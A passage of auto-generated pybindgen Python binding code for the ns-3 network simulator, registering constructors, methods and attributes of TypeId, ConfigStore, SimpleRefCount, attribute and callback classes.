    ## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
    cls.add_method('GetConstructor',
                   'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
    cls.add_method('GetGroupName',
                   'std::string',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function]
    cls.add_method('GetHash',
                   'uint32_t',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
    cls.add_method('GetName',
                   'std::string',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
    cls.add_method('GetParent',
                   'ns3::TypeId',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
    cls.add_method('GetRegistered',
                   'ns3::TypeId',
                   [param('uint32_t', 'i')],
                   is_static=True)
    ## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
    cls.add_method('GetRegisteredN',
                   'uint32_t',
                   [],
                   is_static=True)
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
    cls.add_method('GetTraceSource',
                   'ns3::TypeId::TraceSourceInformation',
                   [param('uint32_t', 'i')],
                   is_const=True)
    ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
    cls.add_method('GetTraceSourceN',
                   'uint32_t',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
    cls.add_method('GetUid',
                   'uint16_t',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
    cls.add_method('HasConstructor',
                   'bool',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
    cls.add_method('HasParent',
                   'bool',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
    cls.add_method('HideFromDocumentation',
                   'ns3::TypeId',
                   [])
    ## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
    cls.add_method('IsChildOf',
                   'bool',
                   [param('ns3::TypeId', 'other')],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
    cls.add_method('LookupAttributeByName',
                   'bool',
                   [param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
                   is_const=True)
    ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member function]
    cls.add_method('LookupByHash',
                   'ns3::TypeId',
                   [param('uint32_t', 'hash')],
                   is_static=True)
    ## type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function]
    cls.add_method('LookupByHashFailSafe',
                   'bool',
                   [param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')],
                   is_static=True)
    ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
    cls.add_method('LookupByName',
                   'ns3::TypeId',
                   [param('std::string', 'name')],
                   is_static=True)
    ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
    cls.add_method('LookupTraceSourceByName',
                   'ns3::Ptr< ns3::TraceSourceAccessor const >',
                   [param('std::string', 'name')],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
    cls.add_method('MustHideFromDocumentation',
                   'bool',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
    cls.add_method('SetAttributeInitialValue',
                   'bool',
                   [param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
    cls.add_method('SetGroupName',
                   'ns3::TypeId',
                   [param('std::string', 'groupName')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
    cls.add_method('SetParent',
                   'ns3::TypeId',
                   [param('ns3::TypeId', 'tid')])
    ## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
    cls.add_method('SetUid',
                   'void',
                   [param('uint16_t', 'tid')])
    return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
    """Register the ns3::TypeId::AttributeInformation struct wrapper: constructors
    and its public instance attributes.

    NOTE(review): auto-generated pybindgen scanner output — regenerate rather than
    hand-edit.
    """
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
    cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
    cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
    cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
    cls.add_instance_attribute('help', 'std::string', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
    cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
    cls.add_instance_attribute('name', 'std::string', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
    cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
    return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
    """Register the ns3::TypeId::TraceSourceInformation struct wrapper:
    constructors and its public instance attributes.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
    cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
    cls.add_instance_attribute('help', 'std::string', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
    cls.add_instance_attribute('name', 'std::string', is_const=False)
    return
def register_Ns3Empty_methods(root_module, cls):
    """Register the ns3::empty placeholder type wrapper (default and copy
    constructors only).

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## empty.h (module 'core'): ns3::empty::empty() [constructor]
    cls.add_constructor([])
    ## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::empty const &', 'arg0')])
    return
def register_Ns3ConfigStore_methods(root_module, cls):
    """Register the ns3::ConfigStore wrapper: constructors, configuration entry
    points (ConfigureAttributes/ConfigureDefaults), TypeId accessors, and the
    file-format/filename/mode setters.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore(ns3::ConfigStore const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ConfigStore const &', 'arg0')])
    ## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore() [constructor]
    cls.add_constructor([])
    ## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureAttributes() [member function]
    cls.add_method('ConfigureAttributes',
                   'void',
                   [])
    ## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureDefaults() [member function]
    cls.add_method('ConfigureDefaults',
                   'void',
                   [])
    ## config-store.h (module 'config-store'): ns3::TypeId ns3::ConfigStore::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## config-store.h (module 'config-store'): static ns3::TypeId ns3::ConfigStore::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFileFormat(ns3::ConfigStore::FileFormat format) [member function]
    cls.add_method('SetFileFormat',
                   'void',
                   [param('ns3::ConfigStore::FileFormat', 'format')])
    ## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFilename(std::string filename) [member function]
    cls.add_method('SetFilename',
                   'void',
                   [param('std::string', 'filename')])
    ## config-store.h (module 'config-store'): void ns3::ConfigStore::SetMode(ns3::ConfigStore::Mode mode) [member function]
    cls.add_method('SetMode',
                   'void',
                   [param('ns3::ConfigStore::Mode', 'mode')])
    return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
    """Register the SimpleRefCount<AttributeAccessor> template instantiation:
    constructors and the static Cleanup() method.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
    cls.add_method('Cleanup',
                   'void',
                   [],
                   is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
    """Register the SimpleRefCount<AttributeChecker> template instantiation:
    constructors and the static Cleanup() method.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
    cls.add_method('Cleanup',
                   'void',
                   [],
                   is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
    """Register the SimpleRefCount<AttributeValue> template instantiation:
    constructors and the static Cleanup() method.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
    cls.add_method('Cleanup',
                   'void',
                   [],
                   is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
    """Register the SimpleRefCount<CallbackImplBase> template instantiation:
    constructors and the static Cleanup() method.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
    cls.add_method('Cleanup',
                   'void',
                   [],
                   is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls):
    """Register the SimpleRefCount<Hash::Implementation> template instantiation:
    constructors and the static Cleanup() method.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function]
    cls.add_method('Cleanup',
                   'void',
                   [],
                   is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
    """Register the SimpleRefCount<TraceSourceAccessor> template instantiation:
    constructors and the static Cleanup() method.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
    cls.add_method('Cleanup',
                   'void',
                   [],
                   is_static=True)
    return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
    """Register the ns3::TraceSourceAccessor abstract base wrapper: constructors
    and the four pure-virtual Connect/Disconnect entry points.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
    ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
    cls.add_constructor([])
    ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
    cls.add_method('Connect',
                   'bool',
                   [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
    cls.add_method('ConnectWithoutContext',
                   'bool',
                   [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
    cls.add_method('Disconnect',
                   'bool',
                   [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
    cls.add_method('DisconnectWithoutContext',
                   'bool',
                   [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3AttributeAccessor_methods(root_module, cls):
    """Register the ns3::AttributeAccessor abstract base wrapper: constructors
    plus the pure-virtual Get/Set/HasGetter/HasSetter interface.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
    ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
    cls.add_constructor([])
    ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
    cls.add_method('Get',
                   'bool',
                   [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
    cls.add_method('HasGetter',
                   'bool',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
    cls.add_method('HasSetter',
                   'bool',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
    cls.add_method('Set',
                   'bool',
                   [param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3AttributeChecker_methods(root_module, cls):
    """Register the ns3::AttributeChecker abstract base wrapper: constructors,
    the pure-virtual Check/Copy/Create and type-information interface, and the
    concrete CreateValidValue helper.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
    ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
    cls.add_constructor([])
    ## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
    cls.add_method('Check',
                   'bool',
                   [param('ns3::AttributeValue const &', 'value')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
    cls.add_method('Copy',
                   'bool',
                   [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
    cls.add_method('Create',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
    cls.add_method('CreateValidValue',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [param('ns3::AttributeValue const &', 'value')],
                   is_const=True)
    ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
    cls.add_method('GetUnderlyingTypeInformation',
                   'std::string',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
    cls.add_method('GetValueTypeName',
                   'std::string',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
    cls.add_method('HasUnderlyingTypeInformation',
                   'bool',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3AttributeValue_methods(root_module, cls):
    """Register the ns3::AttributeValue abstract base wrapper: constructors and
    the pure-virtual Copy/serialization interface.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
    ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
    cls.add_constructor([])
    ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_pure_virtual=True, is_virtual=True)
    ## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3CallbackChecker_methods(root_module, cls):
    """Register the ns3::CallbackChecker wrapper (default and copy constructors
    only; checker behavior comes from the AttributeChecker base).

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
    cls.add_constructor([])
    ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
    return
def register_Ns3CallbackImplBase_methods(root_module, cls):
    """Register the ns3::CallbackImplBase wrapper: constructors and the
    pure-virtual IsEqual comparison.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
    cls.add_constructor([])
    ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
    ## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
    cls.add_method('IsEqual',
                   'bool',
                   [param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3CallbackValue_methods(root_module, cls):
    """Register the ns3::CallbackValue wrapper: constructors, virtual
    Copy/serialization overrides, and the Set mutator.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
    ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
    cls.add_constructor([])
    ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
    cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
    ## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_const=True, is_virtual=True)
    ## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    ## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    ## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
    cls.add_method('Set',
                   'void',
                   [param('ns3::CallbackBase', 'base')])
    return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
    """Register the ns3::EmptyAttributeValue wrapper: constructors and the
    private virtual Copy/serialization overrides.

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
    ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
    cls.add_constructor([])
    ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_const=True, visibility='private', is_virtual=True)
    ## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   visibility='private', is_virtual=True)
    ## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, visibility='private', is_virtual=True)
    return
def register_Ns3TypeIdChecker_methods(root_module, cls):
    """Register the ns3::TypeIdChecker wrapper (default and copy constructors
    only; checker behavior comes from the AttributeChecker base).

    NOTE(review): auto-generated pybindgen scanner output.
    """
    ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
    return
def register_Ns3TypeIdValue_methods(root_module, cls):
